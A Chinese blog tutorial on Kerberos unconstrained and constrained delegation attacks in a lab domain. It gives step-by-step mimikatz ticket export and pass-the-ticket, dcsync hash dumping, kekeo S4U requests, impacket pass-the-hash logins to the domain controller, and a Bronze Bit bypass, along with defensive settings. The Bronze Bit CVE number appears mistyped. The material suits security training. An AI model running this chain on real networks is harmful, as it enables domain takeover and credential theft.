渗透测试的域渗透之域委派攻击

已于 2025-03-13 18:05:48 修改
阅读量1.2k 收藏 28
点赞数 26
CC 4.0 BY-SA版权
分类专栏: 系统入侵与提权 渗透测试 域渗透 文章标签: 渗透测试 windows 系统入侵 权限提升 权限维持 域渗透 域委派攻击
于 2025-03-13 16:41:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YhMjQx/article/details/146235391

文章目录

域委派攻击

教材内容

一、委派概述

1.1 什么是委派

域委派是指将域内用户的权限委派给服务账户,使得服务账户能以用户的权限在域内展开活动。简而言之,就是若用户 A 将自己的权限委派给服务账户 B ,那么服务账户 B 就能以 A 的权限去访问其他服务。

注:能够被委派的用户只能是服务账户或者机器账户。

  • 服务账户:服务器运行服务时所用的账户,用于运行服务并将其加入域内。常见的服务账户有 SQLServer、MYSQL、IIS等。
  • 机器账户:活动目录中的 Computers 组内的计算机,也被称为机器账户。
1.2 委派的类别

域委派分为三种:非约束性委派,约束性委派,基于资源的约束性委派。

二、非约束委派攻击

2.1 原理概述
2.1.1 非约束委派

非约束委派(Unconstrained Delegation, UD):服务账户可以获取被委派用户的 TGT ,并将 TGT 缓存到 lsass 进程中,从而服务账户可使用该 TGT ,模拟用户访问任意服务。

2.1.2 非约束委派流程

image-20230308163145727

  1. 域内用户A 经过Kerberos认证后访问WEB服务器上的资源或页面。
  2. WEB服务器以服务账户B向 KDC 请求用户 A 的认证票据 TGT。
  3. KDC检查服务账户B的委派属性,验证通过后下发 TGT。
  4. 服务账户B利用 TGT 向 KDC 的 TGS 申请服务票据(ST),用于访问文件服务器等功能。
  5. KDC检查委派属性和申请的服务,下发对应服务的ST。
  6. 服务账户B使用 ST 访问其他服务,以获取对应资源。
  7. 认证通过,获取到对应资源。
  8. Web服务器返回资源给用户A。
2.2 复现
2.2.3 实验环境

DC(Windows Server 2008 R2):192.168.219.151 [域控]

Server(Windows7):192.168.219.152 [普通域服务器]

域:woniuxy.com

域管理员:woniuxy\administrator p-0p-0p-0

Sever的本地管理员:server\administrator o-0o-0o-0

普通域用户:web p-0p-0p-0

  • 机器账户的非约束性委派设置

    机器账户 server 的属性中设置委派属性,勾选“信任此计算机来委派任何服务…”,如下:

    image-20230816225335120

  • 服务账户的非约束委派设置

    普通域用户无法进行委派,我们可以创建一个普通域用户,而后将其修改为服务账户,通过添加ServicePrincipalNames 属性进行修改。

      setspn -A https/web lisi

    image-20230816225452406

    而后再次查看对应web用户属性,即可发现委派选项,进行如下设置即可。

    image-20230816225738468

  • 查看域内非约束性委派的机器用户

      AdFind.exe -b "DC=woniuxy,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

    image-20230816225913182

    (注:域内域控机器账户默认设置了非约束委派)

  • 查看域内非约束性委派的服务账户

      AdFind.exe -b "DC=woniuxy,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

    image-20230816230025500

2.2.4 实验过程

以下展示一种基本的利用方式。诱使域管理员访问机器,当域管理员使用net use等远程访问命令访问对应设置了非约束性委派的主机,那么在那台被访问的主机上可以抓取到域控管理员的 TGT。

  1. 模拟域管理员登录或远程访问其c盘。

     net use \\server /user:administrator p-0p-0p-0 
 dir \\server\c$

    image-20230308121516027

  2. 使用server的本地管理员登录server(Windows server 2008),使用 mimikatz 导出票据。

     privilege::debug 
 sekurlsa::tickets /export

    image-20230308121630994

    在当前文件夹下查看到域管理员的票据,如下:

    image-20230308121459872

  3. 导入票据前,访问 dc 的 c 盘,提示登录失败

    image-20230308131349794

  4. 使用 mimikatz 导入票据

     kerberos::ptt [0;21a1f1]-2-0-60a10000-Administrator@krbtgt-WONIUXY.COM.kirbi

    image-20230308132224124

    再次访问,发现成功访问dc的c盘。

    image-20230308131330647

  5. 使用mimikatz的dcsync功能导出administrator的NTLM hash值

    dcsync 是 mimikatz的一个功能,利用的这个原理,通过 Directory Replication Service(DRS) 服务的 GetNCChanges 接口模仿一个域控制器向另一个域控制器发起数据同步请求,能够用来导出域内所有用户的hash。

     lsadump::dcsync /domain:woniuxy.com /user:Administrator

    image-20230308140528564

    能获取到管理员的NTLM值,在CS中直接可以获取域控权限,后续操作均一致。

  6. 使用 impacket 的 wmiexec.py 登录dc。

    (若没有对应脚本可自行下载,https://github.com/fortra/impacket/tree/master/examples)

     python3 /usr/local/bin/wmiexec.py -hashes 1111:9099d68602a60f007c227c4fa95fada6 Administrator@192.168.219.151

    image-20230308135419067

三、约束委派攻击

3.1 原理概述
3.1.1 约束委派

约束委派(Constrained Delegation, CD):由于非约束委派的不安全性,微软在Windows Server 2003中发布了约束性委派。对于约束性委派(Constrained Delegation),即 Kerberos 的两个扩展子协议 S4u2self (Service for User to Self) 和 S4u2Proxy (Service for User to Proxy),服务账户只能获取用户的 ST (Service Ticket),从而只能模拟用户访问特定的服务。

配置了约束性委派的账户,其两个属性会被设置:

  • 账户userAccountControl属性会被设置为TRUSTED_TO_AUTH_FOR_DELEGATION标志位,其值为16781312
  • 账户的msDS-AllowedToDelegateTo属性,添加允许委派的服务

约束委派分为两种:

  • 仅使用Kerberos,无法协议转换
  • 使用任何身份验证协议
3.1.2 S4u2self 与 S4U2proxy 协议

S4u2self :允许服务代表任意用户请求访问自身服务的 ST 服务票据。

S4U2proxy:允许服务在已取得可转发的 ST 服务票据下代表任意用户获取另一个服务的 ST 服务票据。约束委派限制了S4U2proxy协议的请求范围,使得配置了委派属性的服务只能模拟用户身份访问特定的其他服务。

简单来说S4u2self协议使用用户的 TGT 向 KDC 请求用户的可转发的服务票据 ST1,而后 S4U2proxy 协议用这张 ST1 去发起请求用于访问服务器的服务票据 ST2 。

3.1.3 攻击原理

约束性委派攻击的关键就是获得可转发的服务票据 ST,获取根据约束性委派的执行过程可知,只要控制配置约束性委派服务的机器,并获得了机器账户的密码或Hash等凭证,那么就可以劫持这台主机的kerberos 请求过程,最终获得任意用户权限的 ticket。

3.2 复现
3.2.3 实验环境

DC(Windows Server 2008 R2):192.168.219.151 [域控]

Server(Windows 7):192.168.219.152 [普通域服务器]

域:woniuxy.com

域管理员:woniuxy\administrator p-0p-0p-0

Sever的本地管理员:server\administrator o-0o-0o-0

普通域用户(已添加SPN属性):web p-0p-0p-0

  • 设置机器账户的约束性委派,配置此机器账户提供 dc 的 cifs 服务的委派凭据。

    (服务账户同理)

    image-20230816230152242

  • 使用 ADFind 查询配置了约束委派机器账户(主机)

      AdFind.exe -b "DC=woniuxy,DC=com" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

    image-20230309090449923

  • 使用 ADFind 查询配置了约束委派服务账户

      AdFind.exe -b "DC=woniuxy,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

    image-20230309090839148

3.2.3 获取机器账户的票据进行利用

利用条件:

  • 获取一台域内服务器或主机的本地管理员权限
  • 该台域内主机的机器账户配置了约束性委派

  1. 登录域内服务器(Server)的本地管理员账户,在具有管理员权限的cmd中运行mimikatz,并导出票据。

     mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" "exit"

    image-20230309083617215

    导出结果如下,找到对应机器账户 server 的票据 [0;3e7]-2-1-40e10000-SERVER$@krbtgt-WONIUXY.COM.kirbi 。

    image-20230309083842333

  2. 使用kekeo.exe工具申请服务票据(通过S4U2Proxy协议)。

    kekeo是一款开源的票据传递工具,kekeo指定域名、用户名、NTLM哈希来生成对应票据。这里我们通过S4U2Proxy协议获取域管理员的访问域控的cifs服务权限的票据。

     kekeo.exe "tgs::s4u /tgt:[0;3e7]-2-1-40e10000-SERVER$@krbtgt-WONIUXY.COM.kirbi /user:Administrator@woniuxy.com /service:cifs/dc.woniuxy.com" "exit"

    image-20230309083708181

    获取到对应的票据,我们需要的是 cifs 的票据(第一个)。

    image-20230309084029065

  3. 导入票据前,访问 dc 的 c 盘,失败。

  4. 使用mimikatz导入对应票据。

     mimikatz.exe "kerberos::ptt TGS_Administrator@woniuxy.com@WONIUXY.COM_cifs~dc.woniuxy.com@WONIUXY.COM.kirbi" "exit"

    image-20230309085124883

  5. 再次访问 dc 的 c 盘,成功获取。

     dir \\dc\c$

    image-20230309085137837

3.2.3 获取机器账户的 Hash 进行利用

  1. 登录域内服务器(Server)的本地管理员账户,在具有管理员权限的cmd中运行mimikatz,并导出票据。

     mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

    image-20230309085301667

  2. 通过获取到的机器账户的NTLM hash ,在 kali 上使用 impacket 工具包的getST.py进行域管理员票据的获取。

    (若没有对应脚本可自行下载,https://github.com/fortra/impacket/tree/master/examples)

     python3 /usr/local/bin/getST.py -dc-ip 192.168.219.151 -spn CIFS/dc.woniuxy.com -impersonate administrator woniuxy.com/SERVER$ -hashes :332abdb433c67c20717f4271dec6e68b

    image-20230309085508338

  3. 在 /etc/hosts 中添加对应 dc 域名的记录,因为后续利用使用的工具需要用域名的方式访问。

     192.168.219.151 dc.woniuxy.com

  4. 通过获取到的域管理员的票据(ST) ,在 kali 上使用 impacket 工具包的wmiexec.py进行域控远程登录。

     KRB5CCNAME=administrator.ccache python3 /usr/local/bin/wmiexec.py -k woniuxy.com/administrator@dc.woniuxy.com -dc-ip 192.168.219.151

    image-20230309090158784

四、 防御与绕过

4.1 防御措施
  • 将域管理员设置为敏感账户,不能被委派。
  • 若要设置委派,不设置非约束性委派而是设置约束性委派。
  • 可以将敏感用户添加至“Protected Users”组中,该组用户不允许被委派。
4.2 敏感账户设置绕过方式

对域委派安全功能绕过主要是通过Kerberos Bronze Bit攻击(CVE-2020-1704),由于服务可以解密自身的票据并且forwardable值不在PAC中,在使用时,forwardable值不受到检查,进而实现绕过目的。

先将administrator设置为敏感账户。

image-20230309133958737

此时进行委派票据获取是会报错,如下:

image-20230309133841040

我们可以 getST.py 命令中加上“ -force-forwardable ”参数,即可使用对应漏洞进行绕过。

image-20230309134754460

该漏洞可以更新微软补丁程序(KB4598347)进行修复。

域渗透委派攻击
谢公子的博客
07-19 4418
委派是大型网络中经常部署的应用模式,给多跳认证带来很大的便利,同时也带来很大的安全隐患,利用委派可获取管理员权限,甚至制作深度隐藏的后门。 委派 委派是指,将内用户的权限委派给服务账号,使得服务账号能以用户权限开展内活动。 服务账号(Service Account),内用户的一种类型,服务器运行服务时所用的账号,将服务运行起来并加入。例如MS SQL Server在安装...
域渗透委派攻击(非约束/约束/基于资源约束)原理及利用
actistsec的博客
10-15 594
域渗透委派攻击初步了解及利用方法
委派攻击
01-31 504
委派是指,将内用户的权限委派给服务账号,使得服务账号能以用户权限开展内活动。利用委派可获取管理员权限 委派主要分为三种: 非约束性委派 约束性委派 基于资源的约束性委派Windows系统中,只有服务账号和主机账号的属性才有委派功能,普通用户默认是没有的。 01、非约束委派攻击 设置非约束委派 主机账号设置非约束委派: 活动目录中的computers组内的计算机,双...
域渗透-委派攻击
m0_58596609的博客
11-15 1624
委派是大型网络中经常部署的应用模式,给多跳认证带来很大的便利,同时也带来很大的安全隐患,利用委派可获取管理员权限,甚至制作深度隐藏的后门。 一:委派 简单明了:委派就是将内用户的权限委派给服务账号,使得服务账号能以用户权限访问内其他服务。将我的权限给服务账户。 1.1:委派流程 User(laosec\jack)--访问-->Websrv(以User身份)--访问-->Service(文件服务器) 需求:jack需要登陆到后台文件服务器,经过Kerberos认证的过程如下
域渗透委派攻击全集
include_voidmain的博客
08-22 589
域渗透委派攻击全集
rubeus+spoolsample.zip域渗透非约束性委派攻击实验
08-19
在网络安全领,特别是针对Windows环境的渗透测试中,非约束性委派攻击是一种常见的攻击手段。本实验“rubeus+spoolsample.zip”旨在模拟这种攻击,以揭示潜在的安全风险并帮助管理员加强防御措施。以下是关于非...
《内网安全攻防:渗透测试实战指南》读书笔记(七):跨攻击分析及防御
闵行小鱼塘
04-19 3065
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,本章是跨攻击分析及防御,对利用信任关系实现跨攻击的典型方法进行了分析,并对如何部署安全的内网生产环境给出了建议,内容非常简短
域渗透实验:非约束性委派攻击工具解析
资源摘要信息:"rubeus+spoolsample.zip域渗透非约束性委派攻击实验" 在当今的IT安全领中,域渗透测试是一项关键活动,目的是检测和强化企业网络中潜在的安全弱点。在此过程中,理解并掌握各种攻击手段是非常重要...
内网渗透—横向移动&非约束委派&约束委派
2301_76227305的博客
09-06 1161
非约束委派和约束委派的最大区别就是,一个是信任此计算机的任何委派,一个只是信任指定委派。从实际运用来说,非约束委派由于要让DC进行连接才能获得票据,所以有点鸡肋,就不如约束委派。其实说来说去,本质都是票据的伪造,然后进行票据传递。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
“不一样”的真实渗透测试案例分析
HBohan的博客
07-26 3104
前言 本文是由一次真实的授权渗透案例引申而出的技术分析和总结文章。在文章中我们会首先简单介绍这次案例的整体渗透流程并进行部分演绎,但不会进行详细的截图和描述,一是怕“有心人”发现端倪去目标复现漏洞和破坏,二是作为一线攻击人员,大家都明白渗透过程也是一个试错过程,针对某一个点我们可能尝试了无数种方法,最后写入文章的只有成功的一种,而这种方法很有可能也是众所周知的方法。因此我们只会简单介绍渗透流程,然后提取整个渗透过程中比较精华的点,以点及面来进行技术分析和探讨,望不同的人有不同的收获。 白嫖的福音网安学习资.
内安全:委派攻击
8888的博客
08-30 1815
攻击角度来说:如果攻击者拿到了一台配置了非约束委派的机器权限,可以诱导管理员来访问该机器,然后可以得到管理员的TGT,从而模拟管理员访问任意服务,相当于拿下了整个环境,或者结合打印机漏洞让管用户强制回连以缓存 TGT,一个内用户访问WEB服务,但是一些资源在文件服务上,这个时候就需要委派,需要web系统代表用户A去访问文件服务的资源。3、这个时候如果管访问了机器我们的内存中就会有管的TGT,就可以访问任意机器了,在与控上执行访问(在控上执行)
一文带你揭秘委派攻击真相
qq_62169455的博客
03-06 1193
一般来讲,管是不会主动访问被控主机的,因此这里可以利用Windows打印系统远程协议(MS-RPRN)中的默认启动的方法,在该方法中,用户可以使用MS-RPRN方法强制任何运行了Spooler服务的计算机通过Kerberos或者NTLM对攻击者选择的目标进行身份验证。原理:设置非约束委派的主机结合Spooler打印机服务漏洞,让控机器DC强制访问已控的具有本地管理员权限的非约束委派机器,从而拿到控的机器用户hash,进而控制整个。@#45),使用Powermad.ps1脚本来创建​​​​​​​。
Kerberos无约束委派攻击和防御
weixin_30480583的博客
07-05 829
0x00 前言简介 当Active Directory首次与Windows 2000 Server一起发布时,Microsoft就提供了一种简单的机制来支持用户通过Kerberos对Web服务器进行身份验证并需要授权用户更新后端数据库服务器上的记录的方案。这通常被称为Kerberos double-hop issue(双跃点问题),需要委派才能使Web服务器在修改数据库记录时模拟用户操作。 ...
Kerberos 委派攻击之基于资源的约束性委派
Adminxe的博客
03-06 854
CSDN自动迁移博客文章注意区别:约束性委派 不能跨进行委派,基于资源的约束性委派可以跨和林如果约束性委派,必须拥有权限,该特权是敏感的,通常仅授予管理员。为了使用户/资源更加独立,Windows Server 2012 中引入了基于资源的约束委派。基于资源的约束性委派不需要管理员权限去设置,而是把设置属性的权限赋予给了机器自身。基于资源的约束性委派允许资源配置受信任的帐户委派给他们。基于资源的约束性委派只能在运行 ·Windows Server 2012 及以上的控制器·上配置,
域渗透委派攻击之约束委派
qq_56426046的博客
11-13 1015
(7) 如果请求中包含 PAC,则 KDC 通过检查 PAC 的签名数据来验证 PAC ,如果 PAC 有效或不存在,则 KDC 返回 ST2 给 service1,但存储在 ST2 的 cname 和 crealm 字段中的客户端身份是用户的身份,而不是 service1 的身份。不同于允许委派所有服务的非约束委派,约束委派的目的是在模拟用户的同时,限制委派机器/帐户对特定服务的访问。已知在约束委派的情况下,服务用户只能获取某个用户或者主机的服务ST,只能用模拟用户访问特定的服务,
约束委派攻击 实验
最新发布
ULGANOY的博客
10-02 314
Windows内网学习记录
控-笔记三(非约束委派攻击,约束委派攻击
5L2g556F5ZWl77yf
11-25 3780
文章目录一. 委派1.1 委派分类1.2 委派流程1.3 使用委派条件1.4 委派的一些原理二. 委派攻击2.1 非约束委派攻击本地环境非约束委派的查找 一. 委派 1.1 委派分类 非约束委派(Unconstrained delegation) 服务账号可以获取被委派用户的TGT,并将TGT缓存到LSASS进程中,从而服务账号可使用该TGT,模拟用户访问任意服务。配置了非约束委派的账户的userAccountControl 属性有个FLAG位 WORKSTATION_TRUSTED_FOR_DE
Windows 内网渗透之委派攻击
qq_53742230的博客
07-31 1520
委派攻击的三种攻击手法
记录一次学习--委派攻击学习
banliyaoguai的博客
09-26 843
总结一下就是用户 A 去访问服务B,服务 B 的服务账户开启了非约束委派,那么当用户 A 访问服务 B 的时候会将用户 A 的 TGT 发送给服务 B 并保存进内存,服务 B 能够利用用户 A 的身份去访问用户 A 能够访问的任意服务。如果我们可以攻破配置约束委派的服务账户(获取密码/Hash)(这个账户就是上面过程中的服务1账户),我们就可以模拟内任意用户(如 domain\administrator) 并代表其获得对已配置服务的访问权限(获取 TGS 票据)。这里就可尝试强制让控来连接你的机器。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值